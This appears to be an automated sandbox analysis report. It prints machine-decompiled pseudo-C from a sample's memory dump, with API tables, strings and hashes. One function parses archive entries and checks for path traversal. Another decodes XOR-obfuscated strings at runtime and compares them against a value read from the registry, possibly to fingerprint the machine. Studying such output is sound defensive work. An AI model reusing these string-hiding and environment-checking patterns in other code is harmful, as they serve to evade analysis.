								_t278 =  *_t352;
								__eflags =  *((intOrPtr*)( *_t352 + 0x10)) - _t267;
								goto L15;
							}
							E001DF45D(_t278,  &(_v616.dwHighDateTime), 0,  &_v532, 0x104); // executed
							_t364 = _t364 - 0x10 + 0x1c;
							_t168 = E001DF6EE( *_t352,  &_v656, __eflags,  &_v668,  &_v664); // executed
							__eflags = _t168;
							if(_t168 == 0) {
								_t169 = E001DEFFF( *((intOrPtr*)( *_t352)), _v668, 0); // executed
								__eflags = _t169;
								if(__eflags == 0) {
									_t170 = E00200588(_t355, __eflags, _v664);
									_t357 = _t170;
									_v660 = _t170;
									_t171 = E001DF06A(_t170, 1, _v664,  *((intOrPtr*)( *_t352)));
									__eflags = _t171 - _v664;
									if(_t171 == _v664) {
										 *_a8 =  *((intOrPtr*)( *_t352 + 0x10));
										E00207420( &_v264,  &_v528);
										_t358 =  &_v264;
										while(1) {
											_t177 =  *_t358;
											__eflags = _t177;
											if(_t177 == 0) {
												goto L29;
											}
											L24:
											__eflags =  *((char*)(_t358 + 1)) - 0x3a;
											if( *((char*)(_t358 + 1)) != 0x3a) {
												__eflags = _t177 - 0x5c;
												if(_t177 != 0x5c) {
													__eflags = _t177 - 0x2f;
													if(_t177 == 0x2f) {
														goto L27;
													}
													goto L29;
												}
												L27:
												_t358 = _t358 + 1;
												while(1) {
													_t177 =  *_t358;
													__eflags = _t177;
													if(_t177 == 0) {
														goto L29;
													}
													goto L24;
												}
												goto L29;
											}
											_t358 = _t358 + 2;
											continue;
											L29:
											_t178 = E0020E8C3(_t358, "\\..\\");
											__eflags = _t178;
											if(_t178 == 0) {
												_t178 = E0020E8C3(_t358, "\\../");
												__eflags = _t178;
												if(_t178 != 0) {
													goto L30;
												}
												_t178 = E0020E8C3(_t358, "/../");
												__eflags = _t178;
												if(_t178 != 0) {
													goto L30;
												}
												_t178 = E0020E8C3(_t358, "/..\\");
												__eflags = _t178;
												if(_t178 != 0) {
													goto L30;
												}
												_t359 = _a8;
												E00207420(_t359 + 4, _t358);
												_t340 = _v556;
												_v644 = 0;
												_v668 = _t340 >> 0x0000001e & 0xffffff01;
												_t185 = _v608 >> 8;
												_t307 =  !(_t340 >> 0x17) & 0x00000001;
												_v664 = 0;
												_v652.dwLowDateTime = 1;
												__eflags = _t185;
												if(_t185 == 0) {
													L38:
													_t307 = _t340 & 0x00000001;
													_v644 = _t340 >> 0x00000001 & 0xffffff01;
													_v664 = _t340 >> 0x00000002 & 0xffffff01;
													_v668 = _t340 >> 0x00000004 & 0x00000001;
													_t342 = _t340 >> 0x00000005 & 0xffffff01;
													L40:
													_t195 = 0;
													 *(_t359 + 0x108) = 0;
													__eflags = _v668;
													if(_v668 != 0) {
														_t195 = 0x10;
														 *(_t359 + 0x108) = 0;
													}
													__eflags = _t342;
													if(_t342 != 0) {
														_t195 = _t195 | 0x00000020;
														__eflags = _t195;
														 *(_t359 + 0x108) = _t195;
													}
													__eflags = _v644;
													if(_v644 != 0) {
														_t195 = _t195 | 0x00000002;
														__eflags = _t195;
														 *(_t359 + 0x108) = _t195;
													}
													__eflags = _t307;
													if(_t307 != 0) {
														_t195 = _t195 | 0x00000001;
														__eflags = _t195;
														 *(_t359 + 0x108) = _t195;
													}
													__eflags = _v664;
													if(_v664 != 0) {
														_t258 = _t195 | 0x00000004;
														__eflags = _t258;
														 *(_t359 + 0x108) = _t258;
													}
													_t343 = _v592;
													 *((intOrPtr*)(_t359 + 0x124)) = _v584;
													 *((intOrPtr*)(_t359 + 0x128)) = _v580;
													_t310 = _t343 >> 0x10;
													_v652.dwLowDateTime = 0x7bc;
													_v640.wYear = (_t310 >> 9) + _v652.dwLowDateTime;
													_v640.wDay = _t310 & 0x0000001f;
													_v640.wMonth = _t310 >> 0x00000005 & 0x0000000f;
													_v640.wHour = _t343 >> 0xb;
													_v640.wMinute = _t343 >> 0x00000005 & 0x0000003f;
													_v640.wMilliseconds = 0;
													_v640.wSecond = (_t343 & 0x0000001f) + (_t343 & 0x0000001f);
													SystemTimeToFileTime( &_v640,  &_v652);
													_v624.dwLowDateTime = _v652.dwLowDateTime;
													_v624.dwHighDateTime = _v652.dwHighDateTime;
													LocalFileTimeToFileTime( &_v624,  &_v616);
													__eflags = _v660 - 4;
													_t313 = _v616.dwLowDateTime;
													_t217 = _v616.dwHighDateTime;
													 *(_t359 + 0x10c) = _t313;
													 *((intOrPtr*)(_t359 + 0x110)) = _t217;
													 *(_t359 + 0x114) = _t313;
													 *((intOrPtr*)(_t359 + 0x118)) = _t217;
													 *(_t359 + 0x11c) = _t313;
													 *((intOrPtr*)(_t359 + 0x120)) = _t217;
													_t360 = 0;
													if(_v660 <= 4) {
														L61:
														L002001B3(_v656);
														 *_t364 = 0x12c;
														_push(_a8);
														_push(_t352 + 8);
														E00201550();
														 *((intOrPtr*)(_t352 + 0x134)) = _a4;
														goto L7;
													} else {
														while(1) {
															_t315 = _v656;
															_v666 = 0;
															_v668 =  *((intOrPtr*)(_t360 + _t315));
															_v667 =  *((intOrPtr*)(_t360 + _t315 + 1));
															_v652.dwLowDateTime =  *(_t360 + _t315 + 2) & 0x000000ff;
															_t226 = E002053B0( &_v668, "UT");
															__eflags = _t226;
															if(_t226 == 0) {
																break;
															}
															_t360 = _t360 + _v652.dwLowDateTime + 4;
															_t103 = _t360 + 4; // 0x4
															__eflags = _t103 - _v660;
															if(_t103 < _v660) {
																continue;
															}
															goto L61;
														}
														_t346 = _v656;
														_t227 =  *((intOrPtr*)(_t360 + _t346 + 4));
														_t361 = _t360 + 5;
														_t318 = _t227 & 0x000000ff;
														_v664 = _t318 >> 0x00000002 & 0x00000001;
														_v652.dwLowDateTime = _t318 >> 0x00000001 & 0xffffff01;
														__eflags = _t227 & 0x00000001;
														if((_t227 & 0x00000001) == 0) {
															_t274 = _a8;
														} else {
															_t331 =  *(_t361 + _t346) & 0x000000ff;
															_t251 = ((( *(_t361 + _t346 + 3) & 0x000000ff) << 0x00000008 |  *(_t361 + _t346 + 2) & 0x000000ff) << 0x00000008 |  *(_t361 + _t346 + 1) & 0x000000ff) << 8;
															_t361 = _t361 + 4;
															_t252 = _t251 | _t331;
															_t274 = _a8;
															asm("adc edx, 0x19db1de");
															 *(_t274 + 0x120) = _t252 * 0x989680 >> 0x20;
															_t346 = _v656;
															 *((intOrPtr*)(_t274 + 0x11c)) = 0xd53e8000 + _t252 * 0x989680;
														}
														__eflags = _v652.dwLowDateTime;
														if(_v652.dwLowDateTime != 0) {
															_t327 =  *(_t361 + _t346) & 0x000000ff;
															_t242 = ((( *(_t361 + _t346 + 3) & 0x000000ff) << 0x00000008 |  *(_t361 + _t346 + 2) & 0x000000ff) << 0x00000008 |  *(_t361 + _t346 + 1) & 0x000000ff) << 8;
															_t361 = _t361 + 4;
															_t243 = _t242 | _t327;
															_t245 = 0xd53e8000 + _t243 * 0x989680;
															__eflags = _t245;
															 *(_t274 + 0x10c) = _t245;
															asm("adc edx, 0x19db1de");
															 *(_t274 + 0x110) = _t243 * 0x989680 >> 0x20;
														}
														__eflags = _v664;
														if(_v664 != 0) {
															_t234 = ((( *(_t361 + _v656 + 3) & 0x000000ff) << 0x00000008 |  *(_t361 + _v656 + 2) & 0x000000ff) << 0x00000008 |  *(_t361 + _v656 + 1) & 0x000000ff) << 0x00000008 |  *(_t361 + _t347) & 0x000000ff;
															_t236 = 0xd53e8000 + _t234 * 0x989680;
															__eflags = _t236;
															 *(_t274 + 0x114) = _t236;
															asm("adc edx, 0x19db1de");
															 *(_t274 + 0x118) = _t234 * 0x989680 >> 0x20;
														}
														goto L61;
													}
												}
												__eflags = _t185 - 7;
												if(_t185 == 7) {
													goto L38;
												}
												__eflags = _t185 - 0xb;
												if(_t185 == 0xb) {
													goto L38;
												}
												__eflags = _t185 - 0xe;
												if(_t185 != 0xe) {
													_t342 = _v652.dwLowDateTime;
													goto L40;
												}
												goto L38;
											}
											L30:
											_t38 = _t178 + 4; // 0x4
											_t358 = _t38;
										}
									}
									L002001B3(_t357);
								}
								_t162 = 0x800;
								goto L63;
							}
							_t162 = 0x700;
							goto L63;
						}
						E001DF660(_t278);
						goto L14;
					}
					goto L10;
				} else {
					if(_t267 == _t355) {
						L10:
						_t333 = _a8;
						 *_t333 =  *((intOrPtr*)( *_t352 + 4));
						 *((char*)(_t333 + 4)) = 0;
						 *((intOrPtr*)(_t333 + 0x108)) = 0;
						 *((intOrPtr*)(_t333 + 0x10c)) = 0;
						 *((intOrPtr*)(_t333 + 0x110)) = 0;
						 *((intOrPtr*)(_t333 + 0x114)) = 0;
						 *((intOrPtr*)(_t333 + 0x118)) = 0;
						 *((intOrPtr*)(_t333 + 0x11c)) = 0;
						 *((intOrPtr*)(_t333 + 0x120)) = 0;
						 *((intOrPtr*)(_t333 + 0x124)) = 0;
						 *((intOrPtr*)(_t333 + 0x128)) = 0;
						L8:
						_t162 = 0;
						goto L63;
					}
					E00201550(_a8, _t352 + 8, 0x12c);
					L7:
					goto L8;
				}
			}

0x001dfd3c
0x001dfd43
0x001dfd46
0x001dfd47
0x001dfd4b
0x001dfd4f
0x001e025d
0x001e025d
0x001e0262
0x001e0268
0x001e0268
0x001dfd55
0x001dfd5a
0x00000000
0x00000000
0x001dfd63
0x001dfd65
0x001dfd65
0x001dfd6a
0x001dfd73
0x001dfd94
0x001dfd96
0x001dfddf
0x001dfde1
0x001dfde4
0x001dfdf9
0x001dfdf9
0x001dfdef
0x001dfdf4
0x001dfdf4
0x001dfdf6
0x00000000
0x001dfdf6
0x001dfe12
0x001dfe1d
0x001dfe2a
0x001dfe31
0x001dfe33
0x001dfe48
0x001dfe4e
0x001dfe50
0x001dfe60
0x001dfe68
0x001dfe6c
0x001dfe79
0x001dfe80
0x001dfe84
0x001dfe97
0x001dfea9
0x001dfeb0
0x001dfeb7
0x001dfeb7
0x001dfeb9
0x001dfebb
0x00000000
0x00000000
0x001dfebd
0x001dfebd
0x001dfec1
0x001dfec8
0x001dfeca
0x001dfecf
0x001dfed1
0x00000000
0x00000000
0x00000000
0x001dfed1
0x001dfecc
0x001dfecc
0x001dfeb7
0x001dfeb7
0x001dfeb9
0x001dfebb
0x00000000
0x00000000
0x00000000
0x001dfebb
0x00000000
0x001dfeb7
0x001dfec3
0x00000000
0x001dfed3
0x001dfed9
0x001dfee0
0x001dfee2
0x001dfeef
0x001dfef6
0x001dfef8
0x00000000
0x00000000
0x001dff00
0x001dff07
0x001dff09
0x00000000
0x00000000
0x001dff11
0x001dff18
0x001dff1a
0x00000000
0x00000000
0x001dff1d
0x001dff24
0x001dff29
0x001dff3b
0x001dff42
0x001dff4f
0x001dff52
0x001dff55
0x001dff59
0x001dff5e
0x001dff60
0x001dff71
0x001dff77
0x001dff7f
0x001dff8d
0x001dff9b
0x001dff9f
0x001dffab
0x001dffab
0x001dffad
0x001dffb3
0x001dffb7
0x001dffbb
0x001dffbc
0x001dffbc
0x001dffc2
0x001dffc4
0x001dffc6
0x001dffc6
0x001dffc9
0x001dffc9
0x001dffcf
0x001dffd3
0x001dffd5
0x001dffd5
0x001dffd8
0x001dffd8
0x001dffde
0x001dffe0
0x001dffe2
0x001dffe2
0x001dffe5
0x001dffe5
0x001dffeb
0x001dffef
0x001dfff1
0x001dfff1
0x001dfff4
0x001dfff4
0x001dfffa
0x001e0004
0x001e000e
0x001e0014
0x001e001a
0x001e002b
0x001e003b
0x001e0040
0x001e004c
0x001e005e
0x001e0065
0x001e0073
0x001e0079
0x001e0087
0x001e0094
0x001e0099
0x001e009f
0x001e00a4
0x001e00a8
0x001e00ac
0x001e00b2
0x001e00b8
0x001e00be
0x001e00c4
0x001e00ca
0x001e00d0
0x001e00d2
0x001e0232
0x001e0236
0x001e0241
0x001e0248
0x001e0249
0x001e024a
0x001e0252
0x00000000
0x001e00d8
0x001e00d8
0x001e00d8
0x001e00e1
0x001e00e8
0x001e00f0
0x001e00f9
0x001e0102
0x001e0109
0x001e010b
0x00000000
0x00000000
0x001e0114
0x001e0116
0x001e0119
0x001e011d
0x00000000
0x00000000
0x00000000
0x001e011f
0x001e0124
0x001e0128
0x001e012c
0x001e012f
0x001e0142
0x001e0146
0x001e014f
0x001e0151
0x001e019a
0x001e0153
0x001e016c
0x001e0170
0x001e0173
0x001e0176
0x001e017a
0x001e0182
0x001e0188
0x001e018e
0x001e0192
0x001e0192
0x001e019d
0x001e01a2
0x001e01bd
0x001e01c1
0x001e01c4
0x001e01c7
0x001e01d0
0x001e01d0
0x001e01d5
0x001e01db
0x001e01e1
0x001e01e1
0x001e01e7
0x001e01ec
0x001e0212
0x001e021b
0x001e021b
0x001e0220
0x001e0226
0x001e022c
0x001e022c
0x00000000
0x001e01ec
0x001e00d2
0x001dff62
0x001dff65
0x00000000
0x00000000
0x001dff67
0x001dff6a
0x00000000
0x00000000
0x001dff6c
0x001dff6f
0x001dffa7
0x00000000
0x001dffa7
0x00000000
0x001dff6f
0x001dfee4
0x001dfee4
0x001dfee4
0x001dfee4
0x001dfeb7
0x001dfe87
0x001dfe8c
0x001dfe52
0x00000000
0x001dfe52
0x001dfe35
0x00000000
0x001dfe35
0x001dfde6
0x00000000
0x001dfde6
0x00000000
0x001dfd75
0x001dfd77
0x001dfd98
0x001dfd9c
0x001dfda2
0x001dfda4
0x001dfda7
0x001dfdad
0x001dfdb3
0x001dfdb9
0x001dfdbf
0x001dfdc5
0x001dfdcb
0x001dfdd1
0x001dfdd7
0x001dfd8d
0x001dfd8d
0x00000000
0x001dfd8d
0x001dfd85
0x001dfd8a
0x00000000
0x001dfd8a

APIs

Part of subcall function 001DEFFF: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,001DF1EE,00000002,?,00000000,00000244,?,?,001DF321,?,00000000,00000244), ref: 001DF032

SystemTimeToFileTime.KERNEL32(?,000007BC), ref: 001E0079
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001E0099

Strings

/../, xrefs: 001DFEFA
\..\, xrefs: 001DFED3
\../, xrefs: 001DFEE9
/..\, xrefs: 001DFF0B

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileTime$LocalPointerSystem
String ID: /../$/..\$\../$\..\
API String ID: 570408708-3885502717
Opcode ID: e6cc041c97a2930fcf9c9bf7c4b858849d3c6001dbef1c285dee419a492b11cc
Instruction ID: ee0781634a538cae4d1a0987cbfb0f1b38bb70060be9209f671efa7b62e0b248
Opcode Fuzzy Hash: e6cc041c97a2930fcf9c9bf7c4b858849d3c6001dbef1c285dee419a492b11cc
Instruction Fuzzy Hash: 7BE1C4715087418BC315CF28C4816AABBE1EF89314F548A3EF4EACB382D775DA46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001F73C6, Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 349
registryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E001F73C6(intOrPtr __ecx) {
				void* __edi;
				long _t172;
				void* _t179;
				void* _t182;
				void* _t188;
				void* _t192;
				void* _t196;
				void* _t199;
				void* _t203;
				void* _t205;
				void* _t208;
				void* _t211;
				void* _t214;
				void* _t217;
				intOrPtr _t223;
				signed int _t224;
				signed int _t227;
				signed char _t228;
				int _t232;
				void* _t236;
				void* _t240;
				void* _t243;
				void* _t245;
				void* _t249;
				signed char _t253;
				signed char _t255;
				signed char _t258;
				void* _t262;
				void* _t268;
				void* _t272;
				void* _t275;
				signed char _t276;
				signed char _t277;
				void* _t278;
				void* _t279;
				signed char _t282;
				signed int _t283;
				signed int _t284;
				intOrPtr _t287;
				void* _t289;

				L00227790(0x22aacf, _t289);
				_t287 = __ecx;
				_push(_t283);
				 *((intOrPtr*)(_t289 - 0x80)) = __ecx;
				 *(_t289 - 0x2c) = 0;
				_t223 = 0xf;
				 *((intOrPtr*)(__ecx)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = _t223;
				 *((char*)(__ecx)) = 0;
				 *(_t289 - 4) = 0;
				 *(_t289 - 0x64) = 0xff;
				 *(_t289 - 0x2c) = 1;
				E00202C70(_t283, _t289 - 0x198, 0, 0xff);
				asm("movaps xmm0, [0x23d980]");
				asm("movups [ebp-0x60], xmm0");
				 *((intOrPtr*)(_t289 - 0x40)) = 0xe19191e;
				asm("movaps xmm0, [0x23da60]");
				_t232 = 0;
				asm("movups [ebp-0x50], xmm0");
				 *((intOrPtr*)(_t289 - 0x3c)) = 0xe3d1f05;
				 *((intOrPtr*)(_t289 - 0x38)) = 0x4021819;
				 *((short*)(_t289 - 0x34)) = 5;
				do {
					 *(_t289 + _t232 - 0x5f) =  *(_t289 + _t232 - 0x5f) ^  *(_t289 - 0x60);
					_t232 = _t232 + 1;
				} while (_t232 < 0x2c);
				 *((char*)(_t289 - 0x33)) = 0;
				_t172 = RegOpenKeyExA(0x80000002, _t289 - 0x5f, 0, 0x20119, _t289 - 0x30); // executed
				if(_t172 == 0) {
					_t282 = 0x59;
					 *((intOrPtr*)(_t289 - 0x20)) = 0x362b0959;
					 *((intOrPtr*)(_t289 - 0x1c)) = 0x2d3a2c3d;
					_t272 = 0;
					 *((intOrPtr*)(_t289 - 0x18)) = 0x3c343817;
					 *(_t289 - 0x14) = _t172;
					while(1) {
						 *(_t289 + _t272 - 0x1f) =  *(_t289 + _t272 - 0x1f) ^ _t282;
						_t272 = _t272 + 1;
						if(_t272 >= 0xb) {
							break;
						}
						_t282 =  *((intOrPtr*)(_t289 - 0x20));
					}
					 *(_t289 - 0x14) = 0;
					RegQueryValueExA( *(_t289 - 0x30), _t289 - 0x1f, 0, 0, _t289 - 0x198, _t289 - 0x64); // executed
				}
				RegCloseKey( *(_t289 - 0x30));
				 *(_t289 - 0x7c) =  *(_t289 - 0x7c) & 0x00000000;
				 *(_t289 - 0x6c) =  *(_t289 - 0x6c) & 0x00000000;
				 *((intOrPtr*)(_t289 - 0x68)) = _t223;
				L001D2F8E(_t289 - 0x198);
				E001D2503(_t287, _t289 - 0x7c);
				E001D2F2D(_t289 - 0x7c);
				_t275 = 0xa;
				_t236 = _t289 - 0x13;
				_t179 = E001E71F2(_t236, _t275);
				_push(_t236);
				E001E720A(_t289 - 0x4c, _t179, _t289 - 0x13);
				 *(_t289 - 4) = 1;
				_t224 = 0xc3;
				 *(_t289 - 0x2c) = 0xc3;
				_t182 = E001D23AD(_t287, _t289 - 0x4c, 0);
				_t284 = _t283 | 0xffffffff;
				if(_t182 != _t284) {
					L9:
					 *((char*)(_t289 - 0xd)) = 1;
				} else {
					_t268 = _t289 - 0x67;
					_t214 = E001E71F2(_t268, 0x7e0);
					_push(_t268);
					E001E720A(_t289 - 0x98, _t214, _t289 - 0x67);
					_t224 = 0x3c7;
					 *(_t289 - 0x2c) = 0x3c7;
					_t217 = E001D23AD(_t287, _t289 - 0x98, 0);
					 *((char*)(_t289 - 0xd)) = 0;
					if(_t217 != _t284) {
						goto L9;
					}
				}
				if((_t224 & 0x00000004) != 0) {
					_t224 = _t224 & 0xfffffffb;
					 *(_t289 - 0x2c) = _t224;
					E001D2F2D(_t289 - 0x98);
				}
				 *(_t289 - 4) =  *(_t289 - 4) & 0x00000000;
				if((_t224 & 0x00000002) != 0) {
					_t224 = _t224 & 0xfffffffd;
					 *(_t289 - 0x2c) = _t224;
					E001D2F2D(_t289 - 0x4c);
				}
				if( *((char*)(_t289 - 0xd)) == 0) {
					_t276 = 0x66;
					 *((intOrPtr*)(_t289 - 0x18)) = 0x57485e66;
					 *(_t289 - 0x14) = 0;
					_t240 = 0;
					while(1) {
						 *(_t289 + _t240 - 0x17) =  *(_t289 + _t240 - 0x17) ^ _t276;
						_t240 = _t240 + 1;
						if(_t240 >= 3) {
							break;
						}
						_t78 = _t289 - 0x18; // 0x57485e66
						_t276 =  *_t78;
					}
					_push(_t240);
					 *(_t289 - 0x14) = 0;
					if(E001D237C(_t287, _t289 - 0x17) != _t284) {
						L53:
						 *(_t287 + 0x1c) = 3;
						goto L54;
					} else {
						_t277 = 0xf;
						 *((intOrPtr*)(_t289 - 0x1c)) = 0x3e3f3d0f;
						 *((intOrPtr*)(_t289 - 0x18)) = 0x3d5d2f3d;
						_t243 = 0;
						 *(_t289 - 0x14) = 0;
						while(1) {
							 *(_t289 + _t243 - 0x1b) =  *(_t289 + _t243 - 0x1b) ^ _t277;
							_t243 = _t243 + 1;
							if(_t243 >= 7) {
								break;
							}
							_t277 =  *((intOrPtr*)(_t289 - 0x1c));
						}
						_push(_t243);
						 *(_t289 - 0x14) = 0;
						if(E001D237C(_t287, _t289 - 0x1b) != _t284) {
							goto L53;
						} else {
							_t278 = 8;
							_t245 = _t289 - 0x67;
							_t188 = E001E71F2(_t245, _t278);
							_push(_t245);
							E001E720A(_t289 - 0x98, _t188, _t289 - 0x67);
							 *(_t289 - 4) = 2;
							_t227 = _t224 | 0xc08;
							 *(_t289 - 0x2c) = _t227;
							if(E001D23AD(_t287, _t289 - 0x98, 0) != _t284) {
								L26:
								 *((char*)(_t289 - 0xd)) = 1;
							} else {
								_t262 = _t289 - 0x13;
								_t208 = E001E71F2(_t262, 0x7dc);
								_push(_t262);
								E001E720A(_t289 - 0x4c, _t208, _t289 - 0x13);
								_t227 = _t227 | 0x00003010;
								 *(_t289 - 0x2c) = _t227;
								_t211 = E001D23AD(_t287, _t289 - 0x4c, 0);
								 *((char*)(_t289 - 0xd)) = 0;
								if(_t211 != _t284) {
									goto L26;
								}
							}
							if((_t227 & 0x00000010) != 0) {
								_t227 = _t227 & 0xffffffef;
								 *(_t289 - 0x2c) = _t227;
								E001D2F2D(_t289 - 0x4c);
							}
							 *(_t289 - 4) =  *(_t289 - 4) & 0x00000000;
							if((_t227 & 0x00000008) != 0) {
								_t227 = _t227 & 0xfffffff7;
								 *(_t289 - 0x2c) = _t227;
								E001D2F2D(_t289 - 0x98);
							}
							if( *((char*)(_t289 - 0xd)) == 0) {
								_t279 = 7;
								_t249 = _t289 - 0x67;
								_t192 = E001E71F2(_t249, _t279);
								_push(_t249);
								E001E720A(_t289 - 0x4c, _t192, _t289 - 0x67);
								_t228 = _t227 | 0x0000c020;
								if(E001D23AD(_t287, _t289 - 0x4c, 0) != _t284) {
									L38:
									 *((char*)(_t289 - 0xd)) = 1;
								} else {
									_t258 = 0x77;
									 *((intOrPtr*)(_t289 - 0x1c)) = 0x47474577;
									 *((intOrPtr*)(_t289 - 0x18)) = 0x4525574f;
									_t203 = 0;
									 *(_t289 - 0x14) = 0;
									while(1) {
										 *(_t289 + _t203 - 0x1b) =  *(_t289 + _t203 - 0x1b) ^ _t258;
										_t203 = _t203 + 1;
										if(_t203 >= 7) {
											break;
										}
										_t127 = _t289 - 0x1c; // 0x47474577
										_t258 =  *_t127;
									}
									_push(_t258);
									 *(_t289 - 0x14) = 0;
									_t205 = E001D237C(_t287, _t289 - 0x1b);
									 *((char*)(_t289 - 0xd)) = 0;
									if(_t205 != _t284) {
										goto L38;
									}
								}
								if((_t228 & 0x00000020) != 0) {
									E001D2F2D(_t289 - 0x4c);
								}
								if( *((char*)(_t289 - 0xd)) == 0) {
									_t253 = 0xf;
									 *(_t289 - 0x1a) = _t253;
									 *(_t289 - 0x19) = 0x7b7c6659;
									_t196 = 0;
									 *((short*)(_t289 - 0x15)) = 0x6e;
									while(1) {
										 *(_t289 + _t196 - 0x19) =  *(_t289 + _t196 - 0x19) ^ _t253;
										_t196 = _t196 + 1;
										if(_t196 >= 5) {
											break;
										}
										_t253 =  *(_t289 - 0x1a);
									}
									_push(_t253);
									_t145 = _t289 - 0x19; // 0x7b7c6659
									 *(_t289 - 0x14) = 0;
									if(E001D237C(_t287, _t145) != _t284) {
										L52:
										 *(_t287 + 0x1c) = 0;
										goto L54;
									} else {
										_t255 = 0xb;
										 *(_t289 - 0x19) = _t255;
										_t199 = 0;
										 *((intOrPtr*)(_t289 - 0x18)) = 0x333b3b39;
										 *(_t289 - 0x14) = 0;
										while(1) {
											 *(_t289 + _t199 - 0x18) =  *(_t289 + _t199 - 0x18) ^ _t255;
											_t199 = _t199 + 1;
											if(_t199 >= 4) {
												break;
											}
											_t154 = _t289 - 0x19; // 0x7b7c6659
											_t255 =  *_t154;
										}
										_push(_t255);
										_t155 = _t289 - 0x18; // 0x333b3b39
										 *(_t289 - 0x14) = 0;
										if(E001D237C(_t287, _t155) != _t284) {
											goto L52;
										} else {
											 *((intOrPtr*)(_t287 + 0x18)) = 0xa;
											 *(_t287 + 0x1c) = 0;
										}
									}
								} else {
									 *(_t287 + 0x1c) = 1;
									goto L54;
								}
							} else {
								 *(_t287 + 0x1c) = 2;
								L54:
								 *((intOrPtr*)(_t287 + 0x18)) = 6;
							}
						}
					}
				} else {
					 *(_t287 + 0x1c) =  *(_t287 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t287 + 0x18)) = 0xa;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t289 - 0xc));
				return _t287;
			}

0x001f73cb
0x001f73d8
0x001f73dc
0x001f73dd
0x001f73e0
0x001f73e5
0x001f73e6
0x001f73e8
0x001f73eb
0x001f73ee
0x001f73f5
0x001f73f9
0x001f7404
0x001f740b
0x001f7410
0x001f741a
0x001f7420
0x001f7427
0x001f742e
0x001f7430
0x001f7434
0x001f743b
0x001f7442
0x001f7448
0x001f744f
0x001f7453
0x001f7454
0x001f745c
0x001f746f
0x001f7477
0x001f7479
0x001f747b
0x001f7482
0x001f7489
0x001f748b
0x001f7492
0x001f7495
0x001f7495
0x001f7499
0x001f749d
0x00000000
0x00000000
0x001f749f
0x001f749f
0x001f74b0
0x001f74bd
0x001f74bd
0x001f74c6
0x001f74cc
0x001f74d6
0x001f74de
0x001f74e1
0x001f74ec
0x001f74f4
0x001f74fb
0x001f74fc
0x001f74ff
0x001f7504
0x001f750d
0x001f7517
0x001f751e
0x001f7526
0x001f7529
0x001f752e
0x001f7533
0x001f7573
0x001f7573
0x001f7535
0x001f753a
0x001f753d
0x001f7542
0x001f754e
0x001f755b
0x001f7563
0x001f7566
0x001f756b
0x001f7571
0x00000000
0x00000000
0x001f7571
0x001f757a
0x001f757c
0x001f7585
0x001f7588
0x001f7588
0x001f758d
0x001f7594
0x001f7596
0x001f759c
0x001f759f
0x001f759f
0x001f75a8
0x001f75ba
0x001f75bc
0x001f75c3
0x001f75c7
0x001f75c9
0x001f75c9
0x001f75cd
0x001f75d1
0x00000000
0x00000000
0x001f75d3
0x001f75d3
0x001f75d3
0x001f75d8
0x001f75dc
0x001f75ea
0x001f77fa
0x001f77fa
0x00000000
0x001f75f0
0x001f75f0
0x001f75f2
0x001f75f9
0x001f7600
0x001f7602
0x001f7606
0x001f7606
0x001f760a
0x001f760e
0x00000000
0x00000000
0x001f7610
0x001f7610
0x001f7615
0x001f7619
0x001f7627
0x00000000
0x001f762d
0x001f762f
0x001f7630
0x001f7633
0x001f7638
0x001f7644
0x001f7657
0x001f765e
0x001f7664
0x001f766e
0x001f76a9
0x001f76a9
0x001f7670
0x001f7675
0x001f7678
0x001f767d
0x001f7686
0x001f7690
0x001f7699
0x001f769c
0x001f76a1
0x001f76a7
0x00000000
0x00000000
0x001f76a7
0x001f76b0
0x001f76b2
0x001f76b8
0x001f76bb
0x001f76bb
0x001f76c0
0x001f76c7
0x001f76c9
0x001f76d2
0x001f76d5
0x001f76d5
0x001f76de
0x001f76ee
0x001f76ef
0x001f76f2
0x001f76f7
0x001f7700
0x001f770d
0x001f771a
0x001f7759
0x001f7759
0x001f771c
0x001f771c
0x001f771e
0x001f7725
0x001f772c
0x001f772e
0x001f7732
0x001f7732
0x001f7736
0x001f773a
0x00000000
0x00000000
0x001f773c
0x001f773c
0x001f773c
0x001f7741
0x001f7745
0x001f774c
0x001f7751
0x001f7757
0x00000000
0x00000000
0x001f7757
0x001f7760
0x001f7765
0x001f7765
0x001f776e
0x001f777e
0x001f7781
0x001f7784
0x001f778b
0x001f778d
0x001f7793
0x001f7793
0x001f7797
0x001f779b
0x00000000
0x00000000
0x001f779d
0x001f779d
0x001f77a2
0x001f77a3
0x001f77a6
0x001f77b3
0x001f77f5
0x001f77f5
0x00000000
0x001f77b5
0x001f77b7
0x001f77b8
0x001f77bb
0x001f77bd
0x001f77c4
0x001f77c7
0x001f77c7
0x001f77cb
0x001f77cf
0x00000000
0x00000000
0x001f77d1
0x001f77d1
0x001f77d1
0x001f77d6
0x001f77d7
0x001f77da
0x001f77e7
0x00000000
0x001f77e9
0x001f77e9
0x001f77f0
0x001f77f0
0x001f77e7
0x001f7770
0x001f7770
0x00000000
0x001f7770
0x001f76e0
0x001f76e0
0x001f7801
0x001f7801
0x001f7801
0x001f76de
0x001f7627
0x001f75aa
0x001f75aa
0x001f75ae
0x001f75ae
0x001f7810
0x001f7818

APIs

__EH_prolog.LIBCMT ref: 001F73CB
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,?,?), ref: 001F746F
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,?,?), ref: 001F74BD
RegCloseKey.ADVAPI32(?,?,?), ref: 001F74C6

Part of subcall function 001D2F2D: _Deallocate.LIBCONCRT ref: 001D2F3C

